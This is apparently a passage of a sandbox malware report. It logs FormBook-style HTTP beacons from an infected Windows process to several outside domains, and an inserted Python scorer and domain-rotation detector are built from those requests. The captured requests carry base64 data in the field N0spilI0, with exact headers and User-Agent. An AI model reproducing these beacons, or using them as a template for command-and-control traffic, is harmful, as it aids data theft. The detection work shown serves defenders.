                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>
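The www.52ywq.vip and www.zenscape.top sessions above share the traits FormBook beacons are known for: the same hard-coded Mac Chrome/42 User-Agent on every request, a four-character directory as the entire path (/4i87/, /d8cw/), Origin and Referer that merely mirror the Host, one form field (N0spilI0) carrying raw base64 in the POST body or the query string, and the same field name sent to unrelated domains seconds apart. Every reply so far is a 301 from a CDN or a generic 404, so none of these hosts answered as a live C2 in this run and detection has to key on the request side. What follows is an added example, not part of the Joe Sandbox report and not FormBook tooling: a request-side scorer and a domain-rotation check run over requests rebuilt from the sessions above. The score threshold, the 60-second window and the www.example.com control request are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Values observed in the captured sessions above; the threshold is an assumption.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
URI_DIR = re.compile(r"^/[a-z0-9]{4}/$")          # /4i87/, /d8cw/ style directories
B64 = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")   # raw base64, not percent-encoded
BEACON_THRESHOLD = 3

def split_form(s):
    """Split 'k=v&k2=v2' on the first '=' of each pair. urllib.parse.parse_qsl is
    avoided on purpose: it would turn the '+' inside the base64 into a space."""
    return [tuple(p.partition("=")[::2]) for p in s.split("&") if p]

def parse_request(raw):
    """Minimal HTTP/1.1 request parser -> (method, path, query, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, url.path, url.query, headers, body

def score_request(raw):
    """Count FormBook-style traits in one request -> (score, reasons)."""
    method, path, query, headers, body = parse_request(raw)
    host = headers.get("host", "")
    reasons = []
    if headers.get("user-agent") == FORMBOOK_UA:
        reasons.append("hard-coded Mac Chrome/42 User-Agent")
    if URI_DIR.match(path):
        reasons.append("four-character directory as the whole path")
    if method == "POST":
        if headers.get("origin") == f"http://{host}":
            reasons.append("Origin mirrors Host")
        if headers.get("referer") == f"http://{host}{path}":
            reasons.append("Referer mirrors Host and path")
        fields = split_form(body)
        if len(fields) == 1 and B64.match(fields[0][1]):
            reasons.append("single form field carrying a base64 blob")
    elif method == "GET":
        fields = split_form(query)
        if 1 <= len(fields) <= 2 and any(B64.match(v) for _, v in fields):
            reasons.append("base64 blob in the query string")
    return len(reasons), reasons

def is_beacon(raw):
    return score_request(raw)[0] >= BEACON_THRESHOLD

def form_key(raw):
    """Name of the field that carries the blob; it stays constant per build."""
    method, _, query, _, body = parse_request(raw)
    fields = split_form(body if method == "POST" else query)
    return next((k for k, v in fields if B64.match(v)), None)

def rotating_hosts(events, window=timedelta(seconds=60)):
    """events: [(datetime, raw_request)] -> {form_key: sorted hosts} for keys
    sent to two or more distinct hosts inside `window` (decoy-domain rotation)."""
    seen = {}
    for ts, raw in events:
        key = form_key(raw)
        if key is not None:
            seen.setdefault(key, []).append((ts, parse_request(raw)[3].get("host")))
    out = {}
    for key, hits in seen.items():
        hits.sort()
        hosts = sorted({h for _, h in hits})
        if len(hosts) >= 2 and hits[-1][0] - hits[0][0] <= window:
            out[key] = hosts
    return out

def _beacon(method, host, path, payload):
    """Rebuild a request in wire form. Sample data constructed from the sessions
    above; only the headers the detector inspects are reproduced."""
    target = path if method == "POST" else f"{path}?{payload}"
    hdrs = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if method == "POST":
        hdrs += ["Content-Type: application/x-www-form-urlencoded",
                 f"Content-Length: {len(payload)}", f"Origin: http://{host}",
                 f"Referer: http://{host}{path}"]
    hdrs.append(f"User-Agent: {FORMBOOK_UA}")
    return "\r\n".join(hdrs) + "\r\n\r\n" + (payload if method == "POST" else "")

POST_52YWQ = _beacon("POST", "www.52ywq.vip", "/4i87/", "N0spilI0=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTtwIqMnrKwRlqsO9qbhgOgS9/6jJRDrWidI=")
GET_52YWQ = _beacon("GET", "www.52ywq.vip", "/4i87/", "Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8=")
POST_ZENSCAPE = _beacon("POST", "www.zenscape.top", "/d8cw/", "N0spilI0=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/81aENx8A7M00Twoa3yT+MwTNARXxBnz/Hnw==")
BENIGN_GET = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
              "User-Agent: curl/8.6.0\r\n\r\n")         # constructed control sample

EVENTS = [(datetime(2024, 9, 25, 5, 36, 32), POST_52YWQ),   # timestamps from the report
          (datetime(2024, 9, 25, 5, 36, 37), GET_52YWQ),
          (datetime(2024, 9, 25, 5, 36, 43), POST_ZENSCAPE)]
```

Feed `score_request` each request reassembled from a proxy or Zeek log and `rotating_hosts` the (timestamp, request) pairs of one source host; the rotation check is the stronger of the two signals, because a single request with this User-Agent can still be a stale browser, while one form key fanned out to several throwaway domains within a minute is not. The scorer deliberately splits the body itself rather than using `parse_qsl`, since the blob is sent as raw base64 and a '+' decoded to a space would fail the base64 test.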


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      13          192.168.2.4  49750        81.2.196.19     80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:57.255444050 CEST  742                OUT        POST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 67 6a 38 6d 38 35 68 4d 76 4d 6d 47 7a 30 7a 4e 57 77 56 46 6c 77 33 48 47 30 45 53 6e 47 69 72 44 56 63 61 4e 5a 77 47 4c 4f 71 74 56 6c 63 56 44 70 35 79 52 48 7a 2b 2b 63 2f 37 51 73 4e 64 56 73 35 6d 49 4c 66 6c 4c 58 53 59 5a 59 48 41 62 45 68 6e 72 56 59 66 4d 55 74 49 49 44 77 7a 63 4f 31 49 6e 4e 48 72 6c 66 4b 38 34 39 61 39 49 34 39 68 4b 39 2f 78 39 61 55 6e 30 49 46 66 48 4d 72 37 67 2f 30 56 42 30 6d 76 61 50 5a 76 75 4c 4f 53 41 6f 7a 6a 2f 61 4d 6b 54 79 72 36 79 52 44 75 51 54 35 38 79 65 57 34 50 34 75 4e 49 66 7a 65 6c 41 3d 3d
                                                      Data Ascii: N0spilI0=u4hmZftlXCx4gj8m85hMvMmGz0zNWwVFlw3HG0ESnGirDVcaNZwGLOqtVlcVDp5yRHz++c/7QsNdVs5mILflLXSYZYHAbEhnrVYfMUtIIDwzcO1InNHrlfK849a9I49hK9/x9aUn0IFfHMr7g/0VB0mvaPZvuLOSAozj/aMkTyr6yRDuQT58yeW4P4uNIfzelA==
                                                      Sep 25, 2024 05:36:57.915932894 CEST  355                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:36:57 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.4 | 49751 | 81.2.196.19 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:36:59.912911892 CEST | 762 | OUT | POST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPyg6rA0sacowGY+qtNVcQMJ55RHPM+dT7QtpdVpVmI43kZ3SeU4HCUkhnrVYfMUInIHUzd+FInvvs7PK999a9Zo9tK9/H9alM0OBfHJv7gqYWYEmtFfY6l+rrI4Sz4oUDTgvpzXS0BiYrgeyLS/n5FcOX+Niz9kaAU9/Otlc6wuaHt3w=
                                                      Sep 25, 2024 05:37:00.549154043 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:00 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.4 | 49752 | 81.2.196.19 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:02.669400930 CEST | 10844 | OUT | POST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=... [TRUNCATED]
                                                      Sep 25, 2024 05:37:03.334024906 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:03 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.4 | 49753 | 81.2.196.19 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:05.216430902 CEST | 474 | OUT | GET /jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I= HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:05.871893883 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.4 | 49754 | 107.163.130.249 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:11.261343002 CEST | 721 | OUT | POST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=Hgj1voa8347XwoZCwbv8WG00xT1Fc9T8OuuIlnDzW7wCjFHdvbjUcr484ckfqCFAgpJy1+nQBY4ChY25Zxsw5xrGrxnYsi7RpHAfCK1ajT6uQ67kUWa+UHEAVq+kR/G86/ZVpnmMJgMoyFOg84zqYF9nLrZ1b2Q97kQ3Nf4EQjlrjjuuRz3kW6Ap84uoBPijkw==
                                                      Sep 25, 2024 05:37:12.115807056 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.4 | 49755 | 107.163.130.249 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:13.813822031 CEST | 741 | OUT | POST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWIECjl3duajUbr48z8kgpyFbgpNQ17fQBYsChcy5ZBQx5hrEiRnaoi7RpHAfCLQHjTiuRLLkbT29ZnEDcK+kGPG46/Z8pjmiJmAoyE+g8pzrNV9hPrYLTGtE7Wh2C+MnYQpaml/0ACWzE6kah/ncMMfq/+n2iNg3Fbj5ER7Yy7ACNps=
                                                      Sep 25, 2024 05:37:14.686585903 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.4 | 49756 | 107.163.130.249 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:16.362880945 CEST | 10823 | OUT | POST /jyeu/ HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.93187.xyz
                                                      Referer: http://www.93187.xyz/jyeu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWJ8CjW/dv4LUar48w8klpyFagtpU17bfBaUCh/65byIx2hrEgRnbsi7EpHQbCKgHjTiuRIjkfGa9bnEAVq+4R/GQ67NGpjqcJ2gozkugvPnrQl9jCLYDTGhl7WtAC+4dYXharSKrEQmYT8sb2O/FIvrOzcbJt885QqbiGgKUj70meuWVjE6nfEDnNoflfHXV8K0wYBkY1JUkZ6EHt/yOGQ4UnDva6Tk/qt2aUCAfKXmdFqQA0R2n8oXzMbTvWnlmoDx90LD8DnL4DsQ/2OMV9pW3vZokoHBulojmrqg/lzvrzUctoj4B9eIRBDdsO89YoLJIwcdRSGc72GKO6AG1we2Fpaggoj6uYl9jUkGIRjYq7ThDuCC958Fy/feRqau1iU8GkYcrArSBunjmT7N22xO8n2L1HeKkBOWixsmfQNuyywq5apnhXa0YgJW5U6lGOfkZiybY9YvRwdkCS22NOqDkPorUUKamqkN/ZXJkac0CJLA+Wd3GujZ0DHUrW7znzk7qEhZDje+1GBr8R9VAefu21JdULws5pMnTISgaBRgnVfSXQ9LfX4x2/WYeb7L+NMli7rz4lb/yjoVVweZes09V8xEY83kCihyfYyDIDK0GtEXLEfZdRtOhlZ6hsrwiY3uSu0L3n9vINx0fCynKtJDr/g8vNUD3ERNeiaOd5IHxOlB79qS9/b1AYLB+gsPJvVcL5A3gfgOY69xlQKf4Kt2nN9IFnusOqCt6WCa66ZL/mFfYTjLiDzcOiGP8kgdXX1jhp8voI0MwFYDV8M9WTbiotSqmlWpl3/fuLIO7tu3Y6lhaobPC2qKQnNGsoClNjRMNr0/JSjLSF9bWH+bCjWd7Z861ZRynojVneVBom0l9+sicUWXE2IRtYx/MNnvm35wm+fW7forFz20/uzATCBZbsgDTjycFyCIxAIo+tHg1zf33LomjHfHrvbhYc0Qvbqq [TRUNCATED]
                                                      Sep 25, 2024 05:37:17.435687065 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.4 | 49757 | 107.163.130.249 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:18.902671099 CEST | 467 | OUT | GET /jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.93187.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:19.986435890 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "66c48d46-94"
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.4 | 49758 | 52.223.13.41 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:25.430480003 CEST | 739 | OUT | POST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=HZXNRcLtvTVi1CTPvmSSy+HRnKqlNcCNm+uey29doGtHt84PLH/HTVB+JR0DS8PFgWHPE4Ksdu/+hvyTkaSygUqrfXKQ+rEe0tHmLsB9jOfBiV2GXMRMCCnb73uWINpb8Z+27nKKPhBO7vcvJGxHqmRBfRGwFuGMMYJZGkhip53D0vpDO+goZIDm2/BqLq2CLw==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.4 | 49759 | 52.223.13.41 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 25, 2024 05:37:27.966228962 CEST | 759 | OUT | POST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Ascii: N0spilI0=HZXNRcLtvTVi0hLPpFqSjOHerqqlE8CJm+iey34Yo05HtY8PIG/Hf1B+Cx0accOJgWa4E52sdoT+hq2Tkt+x6kqpX3KWzLEe0tHmLskgjNvBikmGWpxPOinc43uWMNph8Z/Z7jrdPjJO7usvKTdIzWQKBRHEVMnQN7EBZnZwsrb14J4ZfPB/LInVr4IeGpLLQ/2X3435226lnfLGCm+4MDY=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
23          192.168.2.4  49760        52.223.13.41    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:30.514311075 CEST  10841              OUT        POST /2fpq/ HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.insicilia.today
                                                      Referer: http://www.insicilia.today/2fpq/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
